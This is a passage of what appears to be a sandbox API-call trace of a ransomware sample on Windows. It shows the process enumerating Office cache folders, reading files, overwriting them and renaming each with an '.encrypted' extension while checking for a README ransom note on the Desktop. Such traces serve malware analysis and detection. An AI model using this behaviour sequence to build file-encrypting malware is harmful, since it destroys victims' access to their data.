Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0194.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0194.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0194.476] GetFileType (hFile=0x2d8) returned 0x1 [0194.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0194.476] GetFileType (hFile=0x2d8) returned 0x1 [0194.476] WriteFile (in: hFile=0x2d8, lpBuffer=0x22a303c*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2ee758, lpOverlapped=0x0 | out: lpBuffer=0x22a303c*, lpNumberOfBytesWritten=0x2ee758*=0x5c0, lpOverlapped=0x0) returned 1 [0194.480] CloseHandle (hObject=0x2d8) returned 1 [0194.481] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0194.481] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.encrypted", lpFilePart=0x0) returned 0x5b [0194.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0194.481] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x597e2b20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0194.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0194.481] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.encrypted")) returned 1 [0194.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0194.483] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0194.483] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpFilePart=0x0) returned 0x48 [0194.483] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f05b0 [0194.484] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.484] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0194.485] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0194.485] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0194.485] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0194.485] FindClose (in: hFindFile=0x94f05b0 | out: hFindFile=0x94f05b0) returned 1 [0194.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0194.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0194.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0194.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0194.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpFilePart=0x0) returned 0x48 [0194.486] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f05b0 [0194.486] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.486] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0194.486] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0194.487] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0194.487] FindNextFileW (in: hFindFile=0x94f05b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0194.487] FindClose (in: hFindFile=0x94f05b0 | out: hFindFile=0x94f05b0) returned 1 [0194.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0194.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0194.487] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpFilePart=0x0) returned 0x51 [0194.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0194.487] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0194.488] GetFileType (hFile=0x2d8) returned 0x1 [0194.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0194.488] GetFileType (hFile=0x2d8) returned 0x1 [0194.488] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x1416b54 [0194.565] ReadFile (in: hFile=0x2d8, lpBuffer=0x26501018, nNumberOfBytesToRead=0x1416b54, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x26501018*, lpNumberOfBytesRead=0x2ee794*=0x1416b54, lpOverlapped=0x0) returned 1 [0195.086] CloseHandle (hObject=0x2d8) returned 1 [0196.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0196.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0196.458] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0196.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0196.459] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpFilePart=0x0) returned 0x51 [0196.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0196.459] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0196.462] GetFileType (hFile=0x26c) returned 0x1 [0196.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0196.462] GetFileType (hFile=0x26c) returned 0x1 [0196.462] WriteFile (in: hFile=0x26c, lpBuffer=0x2f501018*, nNumberOfBytesToWrite=0x1416b60, lpNumberOfBytesWritten=0x2ee784, lpOverlapped=0x0 | out: lpBuffer=0x2f501018*, lpNumberOfBytesWritten=0x2ee784*=0x1416b60, lpOverlapped=0x0) returned 1 [0197.063] CloseHandle (hObject=0x26c) returned 1 [0197.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpFilePart=0x0) returned 0x51 [0197.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.encrypted", lpFilePart=0x0) returned 0x5b [0197.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0197.392] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x5b342820, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1416b60)) returned 1 [0197.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0197.392] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.encrypted")) returned 1 [0197.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0197.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0197.394] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.394] GetFileType (hFile=0x26c) returned 0x1 [0197.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0197.394] GetFileType (hFile=0x26c) returned 0x1 [0197.394] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x5b2 [0197.394] ReadFile (in: hFile=0x26c, lpBuffer=0x22f3e14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x22f3e14*, lpNumberOfBytesRead=0x2ee794*=0x5b2, lpOverlapped=0x0) returned 1 [0197.397] CloseHandle (hObject=0x26c) returned 1 [0197.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0197.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0197.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0197.443] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0197.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0197.443] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0197.444] GetFileType (hFile=0x26c) returned 0x1 [0197.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0197.444] GetFileType (hFile=0x26c) returned 0x1 [0197.445] WriteFile (in: hFile=0x26c, lpBuffer=0x2343af8*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2ee758, lpOverlapped=0x0 | out: lpBuffer=0x2343af8*, lpNumberOfBytesWritten=0x2ee758*=0x5c0, lpOverlapped=0x0) returned 1 [0197.445] CloseHandle (hObject=0x26c) returned 1 [0197.446] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0197.446] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.encrypted", lpFilePart=0x0) returned 0x5b [0197.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0197.447] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x5b3dada0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0197.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0197.447] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.encrypted")) returned 1 [0197.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0197.448] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0197.448] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0197.448] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f06b0 [0197.451] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.451] FindNextFileW (in: hFindFile=0x94f06b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0197.451] 